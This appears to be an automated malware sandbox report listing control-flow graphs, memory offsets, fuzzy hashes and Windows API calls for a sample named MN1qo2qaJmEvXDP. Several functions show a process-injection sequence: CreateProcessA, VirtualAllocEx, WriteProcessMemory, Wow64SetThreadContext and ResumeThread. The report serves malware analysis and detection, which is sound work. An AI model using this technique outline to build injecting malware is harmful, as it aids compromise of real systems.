                                                                  control_flow_graph 0 966ca44-966cae5 3 966cae7-966caf1 0->3 4 966cb1e-966cb3e 0->4 3->4 5 966caf3-966caf5 3->5 11 966cb77-966cba6 4->11 12 966cb40-966cb4a 4->12 6 966caf7-966cb01 5->6 7 966cb18-966cb1b 5->7 9 966cb05-966cb14 6->9 10 966cb03 6->10 7->4 9->9 13 966cb16 9->13 10->9 20 966cbdf-966cc99 CreateProcessA 11->20 21 966cba8-966cbb2 11->21 12->11 14 966cb4c-966cb4e 12->14 13->7 15 966cb50-966cb5a 14->15 16 966cb71-966cb74 14->16 18 966cb5e-966cb6d 15->18 19 966cb5c 15->19 16->11 18->18 22 966cb6f 18->22 19->18 32 966cca2-966cd28 20->32 33 966cc9b-966cca1 20->33 21->20 23 966cbb4-966cbb6 21->23 22->16 25 966cbb8-966cbc2 23->25 26 966cbd9-966cbdc 23->26 27 966cbc6-966cbd5 25->27 28 966cbc4 25->28 26->20 27->27 30 966cbd7 27->30 28->27 30->26 43 966cd2a-966cd2e 32->43 44 966cd38-966cd3c 32->44 33->32 43->44 45 966cd30 43->45 46 966cd3e-966cd42 44->46 47 966cd4c-966cd50 44->47 45->44 46->47 50 966cd44 46->50 48 966cd52-966cd56 47->48 49 966cd60-966cd64 47->49 48->49 51 966cd58 48->51 52 966cd76-966cd7d 49->52 53 966cd66-966cd6c 49->53 50->47 51->49 54 966cd94 52->54 55 966cd7f-966cd8e 52->55 53->52 57 966cd95 54->57 55->54 57->57
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0966CC86
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: b95a6d399c2071a3c8197ee239e82b5112a42e48800d7bd4aa60a8e7ce2437c2
                                                                  • Instruction ID: a4ad158f10147664347a0420f15fafeae5a2cecffa110600a6fbedfa17325352
                                                                  • Opcode Fuzzy Hash: b95a6d399c2071a3c8197ee239e82b5112a42e48800d7bd4aa60a8e7ce2437c2
                                                                  • Instruction Fuzzy Hash: 0BA17F71D00659CFDB20CF69C841BEDBBB2FF88314F148569E988A7260DB789985CF91
                                                                  Function 0966CA50 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 58 966ca50-966cae5 60 966cae7-966caf1 58->60 61 966cb1e-966cb3e 58->61 60->61 62 966caf3-966caf5 60->62 68 966cb77-966cba6 61->68 69 966cb40-966cb4a 61->69 63 966caf7-966cb01 62->63 64 966cb18-966cb1b 62->64 66 966cb05-966cb14 63->66 67 966cb03 63->67 64->61 66->66 70 966cb16 66->70 67->66 77 966cbdf-966cc99 CreateProcessA 68->77 78 966cba8-966cbb2 68->78 69->68 71 966cb4c-966cb4e 69->71 70->64 72 966cb50-966cb5a 71->72 73 966cb71-966cb74 71->73 75 966cb5e-966cb6d 72->75 76 966cb5c 72->76 73->68 75->75 79 966cb6f 75->79 76->75 89 966cca2-966cd28 77->89 90 966cc9b-966cca1 77->90 78->77 80 966cbb4-966cbb6 78->80 79->73 82 966cbb8-966cbc2 80->82 83 966cbd9-966cbdc 80->83 84 966cbc6-966cbd5 82->84 85 966cbc4 82->85 83->77 84->84 87 966cbd7 84->87 85->84 87->83 100 966cd2a-966cd2e 89->100 101 966cd38-966cd3c 89->101 90->89 100->101 102 966cd30 100->102 103 966cd3e-966cd42 101->103 104 966cd4c-966cd50 101->104 102->101 103->104 107 966cd44 103->107 105 966cd52-966cd56 104->105 106 966cd60-966cd64 104->106 105->106 108 966cd58 105->108 109 966cd76-966cd7d 106->109 110 966cd66-966cd6c 106->110 107->104 108->106 111 966cd94 109->111 112 966cd7f-966cd8e 109->112 110->109 114 966cd95 111->114 112->111 114->114
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0966CC86
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 62c087f3b05e92bc5e2d32570fce20e70c3ba32fc6acb5a66de10970784e62d2
                                                                  • Instruction ID: d5d59e7d923889c82b40dd066c386239fa5b0c04438b801a20c762b5c79d9af7
                                                                  • Opcode Fuzzy Hash: 62c087f3b05e92bc5e2d32570fce20e70c3ba32fc6acb5a66de10970784e62d2
                                                                  • Instruction Fuzzy Hash: 80916E71D00659CFEB20CF69C841BEDBBB2FF88314F148569E988A7250DB789985CF91
                                                                  Function 07C89440 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 115 7c89440-7c89455 call 7c8836c 117 7c8945a-7c89465 115->117 118 7c8947a-7c89488 117->118 119 7c89467-7c89477 117->119 122 7c89438-7c8943c 118->122 123 7c8948a-7c8948f 118->123 122->115 124 7c89490-7c8950c CreateIconFromResourceEx 123->124 125 7c8950e-7c89514 124->125 126 7c89515-7c89532 124->126 125->126
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFromIconResource
                                                                  • String ID:
                                                                  • API String ID: 3668623891-0
                                                                  • Opcode ID: 4035895d5b6b7673327bd82fd4275c8df883faa2590c07c20af7dbd76d186012
                                                                  • Instruction ID: 1fc58b7aaa9b94a0614a82f3a8fce733c6421aff89d25a1b127eb04ceb4eded3
                                                                  • Opcode Fuzzy Hash: 4035895d5b6b7673327bd82fd4275c8df883faa2590c07c20af7dbd76d186012
                                                                  • Instruction Fuzzy Hash: C531CFB2804348DFCB11DFAAD840AEEBFF8EF49320F048556E554A7261C335A954DFA1
                                                                  Function 0966C7C1 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 262 966c7c1-966c816 264 966c826-966c865 WriteProcessMemory 262->264 265 966c818-966c824 262->265 267 966c867-966c86d 264->267 268 966c86e-966c89e 264->268 265->264 267->268
                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0966C858
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 5ccf00d3eee0f7a66366f125f0cb7cd9528547d5fbd309b5bf28912ff45ce360
                                                                  • Instruction ID: a69c31fd5069f60cea4ecdab272f395f636ea91ddecd1bd95ec857596c6b9c3e
                                                                  • Opcode Fuzzy Hash: 5ccf00d3eee0f7a66366f125f0cb7cd9528547d5fbd309b5bf28912ff45ce360
                                                                  • Instruction Fuzzy Hash: D821F071D002499FDB10CFAAC885BEEBBF5EF88310F10842AE959A7250C7789955CBA5
                                                                  Function 0966C7C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 272 966c7c8-966c816 274 966c826-966c865 WriteProcessMemory 272->274 275 966c818-966c824 272->275 277 966c867-966c86d 274->277 278 966c86e-966c89e 274->278 275->274 277->278
                                                                  APIs
                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0966C858
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 61cd6681853083eb9ff95a914878b8e323171c8c52dfc0329eb38392f5d46882
                                                                  • Instruction ID: 705cf7ec33e9fc0d0bbf58fc2a007e052b685911a0e184be3ae9694a444b4376
                                                                  • Opcode Fuzzy Hash: 61cd6681853083eb9ff95a914878b8e323171c8c52dfc0329eb38392f5d46882
                                                                  • Instruction Fuzzy Hash: 0A2126719003499FDB10CFAAC884BEEBBF5FF88310F10842AE959A7250C7789954CBA5
                                                                  Function 0966C1F0 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 282 966c1f0-966c243 284 966c245-966c251 282->284 285 966c253-966c283 Wow64SetThreadContext 282->285 284->285 287 966c285-966c28b 285->287 288 966c28c-966c2bc 285->288 287->288
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0966C276
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: f2e68de6aeff6e095beee38dcad657f3fca23eeff5ff1e239f8d4e38d620c731
                                                                  • Instruction ID: bc653c9bc0cfbf6980e55b179efd3b6846e05c87ab9f1487e706ec3f858cbe4a
                                                                  • Opcode Fuzzy Hash: f2e68de6aeff6e095beee38dcad657f3fca23eeff5ff1e239f8d4e38d620c731
                                                                  • Instruction Fuzzy Hash: A2212571D002098FDB10DFAAC485BEEBBF4EF88314F14842AD959A7250C778A945CFA5
                                                                  Function 0966C8B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 292 966c8b0-966c945 ReadProcessMemory 295 966c947-966c94d 292->295 296 966c94e-966c97e 292->296 295->296
                                                                  APIs
                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0966C938
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 46d2bfd0a1228dcde1a7df760a6e48a30a21bfc6f0b413a6aafa7fce3f4a9f9f
                                                                  • Instruction ID: c8929cf5a13eccfb856d94148bd153a51e57e645fc4858d7bd9cfe627cce4d22
                                                                  • Opcode Fuzzy Hash: 46d2bfd0a1228dcde1a7df760a6e48a30a21bfc6f0b413a6aafa7fce3f4a9f9f
                                                                  • Instruction Fuzzy Hash: 9E212771800349DFDB10CFAAC884BEEBBB1FF48310F10842AE958A7250C7789941CBA1
                                                                  Function 0966C8B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 310 966c8b8-966c945 ReadProcessMemory 313 966c947-966c94d 310->313 314 966c94e-966c97e 310->314 313->314
                                                                  APIs
                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0966C938
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: a935f01cf59bdfe5cd49892b13542d43f072ff0a414ce0aee220f159773c4800
                                                                  • Instruction ID: f868cdb4c604b373fa9b7c662e556ec17d932708f40e5839c93587516ffb52dd
                                                                  • Opcode Fuzzy Hash: a935f01cf59bdfe5cd49892b13542d43f072ff0a414ce0aee220f159773c4800
                                                                  • Instruction Fuzzy Hash: BD2116718003499FDB10CFAAC884BEEBBF5FF88320F50842AE558A7250C7799945CBA5
                                                                  Function 0966C1F8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 300 966c1f8-966c243 302 966c245-966c251 300->302 303 966c253-966c283 Wow64SetThreadContext 300->303 302->303 305 966c285-966c28b 303->305 306 966c28c-966c2bc 303->306 305->306
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0966C276
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: aaead7636f28666693e7fae6064de474d146dacda5ba94ae5772fd3bb9fc96bd
                                                                  • Instruction ID: 704c291e7d7ba0ac7ab244c95e136062024ddf49198f84699dc183b6f06cc8b2
                                                                  • Opcode Fuzzy Hash: aaead7636f28666693e7fae6064de474d146dacda5ba94ae5772fd3bb9fc96bd
                                                                  • Instruction Fuzzy Hash: 32212971D003099FDB10DFAAC484BEEBBF4EF88724F14842AD959A7250C778A944CFA5
                                                                  Function 07C8836C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 318 7c8836c-7c8950c CreateIconFromResourceEx 320 7c8950e-7c89514 318->320 321 7c89515-7c89532 318->321 320->321
                                                                  APIs
                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07C8945A,?,?,?,?,?), ref: 07C894FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2436349781.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7c80000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFromIconResource
                                                                  • String ID:
                                                                  • API String ID: 3668623891-0
                                                                  • Opcode ID: 22a6a48bab827740042c95977c60976905ce089be96dfe70e9e05bd232e1e406
                                                                  • Instruction ID: 3463850d6da93d42bc3e73d8b26360820c6bf5fc16d3a1e41b35c4fd52e88ce2
                                                                  • Opcode Fuzzy Hash: 22a6a48bab827740042c95977c60976905ce089be96dfe70e9e05bd232e1e406
                                                                  • Instruction Fuzzy Hash: 461137B1800349DFDB10DFAAC844BEEBFF8EB48324F14851AE915A7210C379A950CFA5
                                                                  Function 0966C701 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 324 966c701-966c783 VirtualAllocEx 327 966c785-966c78b 324->327 328 966c78c-966c7b1 324->328 327->328
                                                                  APIs
                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0966C776
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: ab755c9e5d3c9c5c55bee7efd14bde0ebcb093da4a9b22a1f409415f2b220a88
                                                                  • Instruction ID: 2fa83874145f865756d0e6b5b5f912beb6767a0ccfeff65d0d5961ea64301a29
                                                                  • Opcode Fuzzy Hash: ab755c9e5d3c9c5c55bee7efd14bde0ebcb093da4a9b22a1f409415f2b220a88
                                                                  • Instruction Fuzzy Hash: CD2147718002499FDB10DFA9C844BEEBFF5EF88324F10842AD555A7260C7799550CFA0
                                                                  Function 0966C708 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 332 966c708-966c783 VirtualAllocEx 335 966c785-966c78b 332->335 336 966c78c-966c7b1 332->336 335->336
                                                                  APIs
                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0966C776
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: ce75101d9228b5d7ce60db8d907b020e9ca0dd6b5580589000579d5b53391f69
                                                                  • Instruction ID: 060f9ca128fa625e3d59d8be28b4e9937501aec46819311a5f7d2ded9cbd3398
                                                                  • Opcode Fuzzy Hash: ce75101d9228b5d7ce60db8d907b020e9ca0dd6b5580589000579d5b53391f69
                                                                  • Instruction Fuzzy Hash: 951137758002499FDB10DFAAC844BEFBFF5EF88720F10841AE655A7260C779A954CFA1
                                                                  Function 0966C140 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 340 966c140-966c1b7 ResumeThread 343 966c1c0-966c1e5 340->343 344 966c1b9-966c1bf 340->344 344->343
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: 9f95a30f5c4f01ae98dc90de68c0f6459b349feeab6632b847441e09e437925d
                                                                  • Instruction ID: 155f9c3adb815e355f3f4bbcba13c6034bc98a0aecc47e0930ca000624dde669
                                                                  • Opcode Fuzzy Hash: 9f95a30f5c4f01ae98dc90de68c0f6459b349feeab6632b847441e09e437925d
                                                                  • Instruction Fuzzy Hash: B41134B1C002488FEB20DFAAC8457AEFFF4AB88324F10842AD559A7250C779A945CF95
                                                                  Function 0094F078 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0094F0DD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2413545836.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_940000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: f83d62b97ee928c3da78058c9370f24d6f524b9d5f04124d65547ae83b5d4063
                                                                  • Instruction ID: 3209c20a08ac1e63aea2a9dc9149722239791bf380c1e647b41ed505f58dd630
                                                                  • Opcode Fuzzy Hash: f83d62b97ee928c3da78058c9370f24d6f524b9d5f04124d65547ae83b5d4063
                                                                  • Instruction Fuzzy Hash: AF11C1B1804389CFDB10CF59D5447EEBFF4EB48314F108499D558A3242D379AA18CFAA
                                                                  Function 0966C148 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437953758.0000000009660000.00000040.00000800.00020000.00000000.sdmp, Offset: 09660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9660000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  • Opcode ID: f0f9938e013fa7c4dcf54a4c968b452c87ce0b2aede55fef61011b52663c8fc8
                                                                  • Instruction ID: dc51ae766c9ee23e14bed0726729fee1e8c1a8f31c9d7d23fc973e18c0806394
                                                                  • Opcode Fuzzy Hash: f0f9938e013fa7c4dcf54a4c968b452c87ce0b2aede55fef61011b52663c8fc8
                                                                  • Instruction Fuzzy Hash: 2C112871D003498BDB10DFAAC8447AEFBF4EF88724F10841AD559A7250CB79A944CFA5
                                                                  Function 0944137A Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 094413DD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437631109.0000000009440000.00000040.00000800.00020000.00000000.sdmp, Offset: 09440000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9440000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: b4c6c49b43f0aa22f4288ed15c4a9af1d63c936fcc5ddf797c550c1a02a75b42
                                                                  • Instruction ID: 80e594026690a95f158bcdd5ae2780032c56fc737cd0db8c0f8d16d2bc440183
                                                                  • Opcode Fuzzy Hash: b4c6c49b43f0aa22f4288ed15c4a9af1d63c936fcc5ddf797c550c1a02a75b42
                                                                  • Instruction Fuzzy Hash: 6411E3B58002499FDB10CF9AD585BDEBBF4EB48310F10841AD558A3610C375A944CFA5
                                                                  Function 09441380 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 094413DD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2437631109.0000000009440000.00000040.00000800.00020000.00000000.sdmp, Offset: 09440000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_9440000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  • Opcode ID: e8625aa519a158e0a6fcd2215608ef3ce1b29dc334f775b60a830d3e8aedda1d
                                                                  • Instruction ID: 868ad68429a1c1d2163161e01a927d3d9af6f7249e841da6946d2a56d37b161b
                                                                  • Opcode Fuzzy Hash: e8625aa519a158e0a6fcd2215608ef3ce1b29dc334f775b60a830d3e8aedda1d
                                                                  • Instruction Fuzzy Hash: 4011D3B5800349DFDB10DF9AD985BDEBBF8EB48320F10841AE558A7610C379A984CFA5
                                                                  Function 008DD3B4 Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2407898997.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8dd000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 608ea34bce4e766f6cd8cb82f3203de25d6eecbc3670d139c19f6d4e8a2e76b2
                                                                  • Instruction ID: 593c117fca24a6337690c1a4e4f138493ec3f5383493833b17555df2920b1ab2
                                                                  • Opcode Fuzzy Hash: 608ea34bce4e766f6cd8cb82f3203de25d6eecbc3670d139c19f6d4e8a2e76b2
                                                                  • Instruction Fuzzy Hash: CC21F472500344DFDB04DF14D9C0B16BFA6FB88324F24C66AE9058B356C336E856CAA2
                                                                  Function 008ED01C Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2408284111.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8ed000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e01c33d940f87898d137d8f9b3b179cc52673ad6fe3274c723af3e37a2b06f1c
                                                                  • Instruction ID: cafb1fbf4951f4398e05175e0acfceb8b146b9e49d6f40145413b3bafe5b8e17
                                                                  • Opcode Fuzzy Hash: e01c33d940f87898d137d8f9b3b179cc52673ad6fe3274c723af3e37a2b06f1c
                                                                  • Instruction Fuzzy Hash: 4D212271604784EFDB14DF15D980B16BBA1FB89314F38C56DD80A8B282C33AD84BCA61
                                                                  Function 008ED1D4 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2408284111.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8ed000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d731b3e63f8a0433110b87c742441cfdb5a6ec4c3778d9a9020b4346c6132db7
                                                                  • Instruction ID: b090b4ee0ad75d5e38b420dd02131564f3bd773b3ed45b1c35ad2abd8710addb
                                                                  • Opcode Fuzzy Hash: d731b3e63f8a0433110b87c742441cfdb5a6ec4c3778d9a9020b4346c6132db7
                                                                  • Instruction Fuzzy Hash: D9212975504384EFDB05DF15D5C0B16BBA5FB89314F34C56DDA098B292C336E84ACB61
                                                                  Function 008ED006 Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2408284111.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8ed000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 652e6756982c609aa0f548af078d93a1cbad7707e64d5939502740a777dbe0b1
                                                                  • Instruction ID: f152543a1bd43de01ddeb0195578f3a5b15be96f3a07a4d61853624db738cd6b
                                                                  • Opcode Fuzzy Hash: 652e6756982c609aa0f548af078d93a1cbad7707e64d5939502740a777dbe0b1
                                                                  • Instruction Fuzzy Hash: E1214F755087C49FCB02CF14D994715BFB1FB46314F28C5EAD8498B2A7C33A985ACB62
                                                                  Function 008DD3AF Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2407898997.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8dd000_MN1qo2qaJmEvXDP.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cfb52f8b9dfce4186a4761286b1afaf252fc13293eafdb1bf8f112f6695a61f7
                                                                  • Instruction ID: 1fc3723e234929f19d81e4a3dd7fdd1428cb11d00422be6b0314a308348b75f7
                                                                  • Opcode Fuzzy Hash: cfb52f8b9dfce4186a4761286b1afaf252fc13293eafdb1bf8f112f6695a61f7
                                                                  • Instruction Fuzzy Hash: F011B176504380DFCB15CF10D5C4B16BF72FB94324F24C6AAD8494B656C33AE856CBA1
                                                                  Function 008ED1CF Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2408284111.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
